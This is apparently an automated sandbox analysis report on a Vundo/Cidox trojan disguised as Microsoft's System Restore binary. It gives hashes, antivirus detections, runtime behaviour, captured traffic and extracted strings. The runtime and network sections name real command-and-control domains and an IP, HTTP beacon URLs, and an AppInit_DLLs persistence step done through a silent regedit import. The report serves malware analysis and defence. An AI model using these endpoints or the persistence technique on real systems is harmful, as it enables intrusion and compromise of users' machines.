Analysis Date: 2014-10-31 16:14:12
MD5: 33a8f404432335d3564e071bf925ee1c
SHA1: ab93199b1576ece9b13efe2fb9a9cc8db555d76f

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: a9203a1cc01f9b0f484624acacfdc942 sha1: 6f41d4c06bd740cc857107a74c1592da3e5ccbf9 size: 91648
Section _ASM2: md5: 5cbdb671cc3cd9b028945704dfb18263 sha1: 2c7f4695add5826a76301516006fca2d6cf0a3f4 size: 63488
Section .rdata: md5: 80759194640cd0c281898748a3c7253b sha1: dcb925370efdab1968bdce434442f7fbd7245c68 size: 8192
Section .data: md5: 1695711b55e0545e6ce1f490e5461ba9 sha1: 23a499463667bfda6e2f52b56f4fa651be33479f size: 5120
Section .tls: md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .rsrc: md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304
Timestamp: 2012-09-25 02:26:21
Version
LegalCopyright: © Корпорация Майкрософт. Все права защищены.
InternalName: RSTRUI.EXE
FileVersion: 5.1.2600.5512 (xpsp.080413-2108)
CompanyName: Корпорация Майкрософт
ProductName: Операционная система Microsoft® Windows®
ProductVersion: 5.1.2600.5512
FileDescription: Приложение восстановления системы
OriginalFilename: RSTRUI.EXE
Packer: Microsoft Visual C++ ?.?
PEhash: ed7168502630d6f765608bf68788c6f93aa2bee5
IMPhash: 11c52178b812c23b7febf02fc8e99619
AV 360 Safe: Gen:Variant.Kazy.211341
AV Ad-Aware: Gen:Variant.Kazy.211341
AV Alwil (avast): Vundo-XF [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Cidox.A.gen!Eldorado
AV Avira (antivir): TR/Vundo.Gen7
AV BullGuard: Gen:Variant.Kazy.211341
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Vundo.Gen
AV ClamAV: Win.Trojan.Cidox-121
AV Dr. Web: Trojan.Mayachok.17986
AV Emsisoft: Gen:Variant.Kazy.211341
AV Eset (nod32): Win32/Kryptik.AMFU
AV Fortinet: W32/Citirevo.AB!tr
AV Frisk (f-prot): W32/Cidox.A.gen!Eldorado
AV F-Secure: Gen:Variant.Kazy.211341
AV Grisoft (avg): Generic_r.BGN
AV Ikarus: Trojan-Downloader.Win32.Vundo
AV K7: Backdoor ( 04c4f2bf1 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Trojan.FakeMS.ED
AV Mcafee: Vundo-FASV!33A8F4044323
AV Microsoft Security Essentials: TrojanDropper:Win32/Vundo.V
AV MicroWorld (escan): Gen:Variant.Kazy.211341
AV Norman: Gen:Variant.Kazy.211341
AV Rising: Trojan.Win32.Generic.1349AE9B
AV Sophos: Mal/Vundo-M
AV Symantec: Trojan.Zatvex!gen6
AV Trend Micro: TROJ_VUNDO.SMKK
AV VirusBlokAda (vba32): Backdoor.Cidox

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\Administrator\Cookies\index.dat

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Creates File: C:\WINDOWS\system32\dauaakj.dll
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS: clickbeta.ru
Winsock DNS: denadb.com
Winsock DNS: 91.220.35.154
Winsock DNS: terrans.su
Winsock DNS: tryatdns.com
Winsock DNS: clickclans.ru
Winsock DNS: denareclick.com
Winsock DNS: fescheck.com
Winsock DNS: instrango.com
Winsock DNS: verzinla.com
Winsock DNS: getintsu.com
Winsock DNS: tegimode.com
Winsock DNS: netrovad.com
Winsock DNS: nshouse1.com
Winsock DNS: veriolana.com
Winsock DNS: inzavora.com
Winsock DNS: odobvare.com
Winsock DNS: foradns.com
Winsock DNS: getavodes.com
Winsock DNS: clickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\dauaakj.dll\\x00

Network Details:

DNS: getintsu.com, Type: A, answer: 141.8.225.80
DNS: getavodes.com, Type: A, answer: 141.8.225.80
DNS: tryatdns.com, Type: A, answer: 141.8.225.80
DNS: fescheck.com, Type: A, answer: 209.222.14.3
DNS: inzavora.com, Type: A, answer: 141.8.225.80
DNS: denadb.com, Type: A, answer: 204.11.56.26
DNS: foradns.com, Type: A, answer: 209.222.14.3
DNS: veriolana.com, Type: A
DNS: verzinla.com, Type: A
DNS: instrango.com, Type: A
DNS: netrovad.com, Type: A
DNS: odobvare.com, Type: A
DNS: terrans.su, Type: A
DNS: tegimode.com, Type: A
DNS: clickstano.com, Type: A
DNS: denareclick.com, Type: A
DNS: clickbeta.ru, Type: A
DNS: nshouse1.com, Type: A
DNS: clickclans.ru, Type: A
HTTP GET: http://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUfDCwx835jSU
User-Agent:
HTTP GET: http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUX3J49FLC6Zz
User-Agent:
HTTP GET: http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxURz7+qiRh4pJ
User-Agent:
HTTP GET: http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxURRF51nwD1/z
User-Agent:
HTTP GET: http://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUfDCwx835jSU
User-Agent:
HTTP GET: http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUeY4cMHbVW5i
User-Agent:
HTTP GET: http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUQ0bnSPKR2xz
User-Agent:
HTTP GET: http://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUZy5Ea2PjIuA
User-Agent:
Flows TCP: 192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 204.11.56.26:80
Flows TCP: 192.168.1.1:1037 ➝ 209.222.14.3:80
Flows TCP: 192.168.1.1:1038 ➝ 91.220.35.154:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785566 44437778 3833356a 53552048   UxUfDCwx835jSU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   6574696e 7473752e 636f6d0d 0a0d0a     etintsu.com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785558 334a3439 464c4336 5a7a2048   UxUX3J49FLC6Zz H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   65746176 6f646573 2e636f6d 0d0a0d0a   etavodes.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785552 7a372b71 69526834 704a2048   UxURz7+qiRh4pJ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2074   TTP/1.1..Host: t
0x000000e0 (00224)   72796174 646e732e 636f6d0d 0a0d0a0a   ryatdns.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785552 52463531 6e774431 2f7a2048   UxURRF51nwD1/z H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   65736368 65636b2e 636f6d0d 0a0d0a0a   escheck.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785566 44437778 3833356a 53552048   UxUfDCwx835jSU H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2069   TTP/1.1..Host: i
0x000000e0 (00224)   6e7a6176 6f72612e 636f6d0d 0a0d0a0a   nzavora.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785565 5934634d 48625657 35692048   UxUeY4cMHbVW5i H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2064   TTP/1.1..Host: d
0x000000e0 (00224)   656e6164 622e636f 6d0d0a0d 0a0d0a0a   enadb.com.......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   55785551 30626e53 504b5232 787a2048   UxUQ0bnSPKR2xz H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   6f726164 6e732e63 6f6d0d0a 0d0a0a0a   oradns.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 34343026   XX0000&key=3440&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796777 67757762 5470716e 7266442b   WygwguwbTpqnrfD+
0x000000b0 (00176)   3648306a 7451775a 4a357434 2b624e39   6H0jtQwZJ5t4+bN9
0x000000c0 (00192)   5578555a 79354561 32506a49 75412048   UxUZy5Ea2PjIuA H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2039   TTP/1.1..Host: 9
0x000000e0 (00224)   312e3232 302e3335 2e313534 0d0a0d0a   1.220.35.154....
0x000000f0 (00240)                                         


Strings
P.
.
.3..w
.jyY}..uriVttcetorla
\
.CC
 
.N. .
E
uri
041904B0
1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee
1Display debugger and debuggee version information
333f3
5.1.2600.5512
5.1.2600.5512 (xpsp.080413-2108)
7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information
8Configure mapping from file extension to source language
About WinDbg
Activate window
Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows
Close all source windows-Close all windows that are error placeholders"Open a new docked window container
CompanyName
CWindowClass
Debug operations
Detach the current program
Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier
Dock all undocked windows
f3fff
FileDescription
FileVersion
                                 H
         (((((                  H
Halt the current program
Help contents and searches
         h((((                  H
InternalName
KERNEL32.DLL
Kernel debugging control.Cycle through the available baud rate settings
LegalCopyright
Manage event filters
Manage open windows
:Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available
 Microsoft
mscoree.dll
Open a command browser window
Open the command window
Open the disassembly window
Open the help index
Open the help search dialog
Open the help table of contents)Open the help for the current window type)Open help for the currently selected text
"Open the process and thread window
Open the registers window
Open the scratch pad window"Open the process and thread window
OriginalFilename
ProductName
ProductVersion
Restart the Program"Stop debugging the current program
RSTRUI.EXE
Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running
Step over the next statement Step out of the current function1Run the program to the line containing the cursor
StringFileInfo
Toggle the status bar on or off
Toggle the status bar on or off,View or edit the font for the current window
Toggle the toolbar on or off
Trace into the next statement
Translation
Undock all docked windows
VarFileInfo
View program options
View the module list
View WinDbg's command line
VS_VERSION_INFO
 Window arrangement and selection
 Windows
                          
{,0.+0q 
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0SSSSS
0trueM
1.CQx(1
1eX&.&
 1@]z1	\
2DU}|r
	"2`EtV
2hcF6n
2nrst]
$#)39W
3aotsg
3DJTZ,sTZ
3[Heef}
3u'xI#
3UYjVff
4:(3|?
43DqG/
4`8R8su
5(g'S|
.5ps25
5RoX0{j
6bWnga k
6BXpteS
6;jkvgfkJ{
^!))6z
7WnyuZ
7zO}qk
8;7780
)`@8@8
8EEMM<
8EHUXQ
&8LkQL
]@]8oE[
a>18R0
a,2<B_
'A5:TQ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADVAPI32.dll
ADVAPI32.DLL
AdviseInUserModeA
aIvNZR
AkgM n
An application has made an attempt to load the C runtime library incorrectly.
>anqybnq~
=APAWG
/apral
`_ASM2
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
aVGq4b
AWhk>h
BeginPaint
b`jVMUj
\BLR?a
bp@FoA
	bQrV%
bRUQZK(
bXeud}
C@ @ 7s@ @ 
cb"cpm
CcoWoG
ChBRjs
ci7$CISY
CIFQlSlR~
c$L@M0
CloseHandle
CorExitProcess
CoTaskMemAlloc
CreateBitmap
CreateSolidBrush
CreateWindowExA
- CRT not initialized
@.data
DateTime:%04d.%02d:%d
DDDDDC
DDDDDDDDDD
dddd, MMMM dd, yyyy
December
DecodePointer
DeleteCriticalSection
DestroyWindow
deu3lhIi,Mr)
DeviceIoControl
^df*j"
Di6yGW
DispatchMessageA
DOMAIN error
DrawTextA
DTeiej
Dv)UArSay
D |x>)ZW
E2hJeelsP
eegt4)
eFa!"4%
eiJ!6=
eile~r
em1Ub[
EncodePointer
EndPaint
EnterCriticalSection
{eoao^
err3w)trr0o
ExitProcess
February
fek?{M
FindResourceA
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
f!V_v1
gC    
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
G@jji'
gnrp)v
GpKFsq
<]|GQn	\
g[V'1'
h9,B,B4
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
heF1.ttloM
hF`Y>.
HH:mm:ss
hrpYg2[.
hsXBBhB]
_Hu2,R
h	wnKg
   HX	
HY>O[*
:I2~pn-
+i5&n.LA1
IDDu"c{h!
i isb]
IL"YWii 
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
IsDebuggerPresent
IsValidCodePage
ItrmGOv
iWfm72ei
+J3G/t
JanFebMarAprMayJunJulAugSepOctNovDec
January
JavaStudioClass
jBk1PY
jCos $#eLiai
j@Eh@h
j@j ^V
(,JW6h"
KERNEL32.dll
K;|euF
@kGZn]~
k|oNZ	h
L /0?t
l4g2q&k
L}69c%c>
lBSEaY
Lc0Zzon
LCMapStringA
LCMapStringW
LeA2dM
LeaveCriticalSection
?(LEj9
lFlF0j
lGplru
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadIconW
LoadLibraryA
LoadResource
LoadStringA
LockResource
lstrcmpiA
mdAyd,
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
MS]c5Z}tna{<t
MultiByteToWideChar
M<X&$W
n"@!@!
~    N
' N/0o
N!1o'5
n9t<H%
nes%dc
nevpXqB
nng9	lanrgS0
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
^npduK
NVPV<=(
Nyntc$[CD
o2lp=Lroeeq0bLLb
October
o,Er)oa
ole32.dll
~}ollr)
o^L%\T
OngBeVso
*oo| f
OstDQiotLX3lee
ot~#ilslafl
Ouuuu@
$'"!P&Dv
Pf ltlRGi
>__ PiA$T
Please contact the application's support team for more information.
pMcj8JuD
PPPPPPPP
Program: 
<program name unknown>
=P_]tE
- pure virtual function call
(PV`f>
'*PyGJWZ
q'<BKe
qeaEca
Q_\|pq
qQ[=^c
QueryPerformanceCounter
[r:}^}
r2U/LP
R4#{HTj
>!rant
rAtetYE.H
`.rdata
rea5p.0215
Rectangle
RegConnectRegistryA
RegisterClassExA
reny-/
rIsmC{t
rMCR)Ngexe?*
rrdr~zoee
|@@rt@
RtlUnwind
rTor(]eieK
runtime error 
Runtime Error!
s5rs\EC0io
Saturday
scm32.dll
September
SetFilePointer
SetHandleCount
SetLastError
SetParent
SetUnhandledExceptionFilter
S$/H?D3T_
ShowWindow
SING error
@ skyHJocnaQ
:]SlG^
snelvLbvsllYIoae}
^soda$
~SQtg9
S$R4Q%
strcat
Sunday
SunMonTueWedThuFriSat
SX),FE
s;ZiKd
==taju]
tAOitYDtHoyHo
TerminateProcess
TextOutA
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
tiiin|eP9i
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
tluNi_
tlWttPFs
tMaT/L
TranslateAcceleratorA
TranslateMessage
TrC1i{
t"SS9]
t$<"u	3
Tuesday
;t$,v-
Tvh@:$
tv mkw*=EoPg
t+WWVPV
tx0bgF
t}(yiCF
:U	0K`c
%_uag@Wk
uAnl?LgV0l^wGcP
UEngGu
UE}u%3j
u`j^mkE
u-|ltdo
ULX6^+
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UN=I0|d
UpdateWindow
UQPXY]Y[
URPQQh
USER32.dll
USER32.DLL
UW('=u
;U[x=$%
Vihnu0
VirtualAlloc
VirtualFree
vM6=1%
v	N+D$
`vtvd!' 
;vu]hF
W24Yu7
|"w	5Hi^
wB5Gz\
Wednesday
WideCharToMultiByte
WriteFile
`WsniW
wsprintfA
wtDDDDDDDC
Wt	j~^
Wu ^xz
wwwws0
wwwwwwws
wwwwwwww?
wwwwwwwws
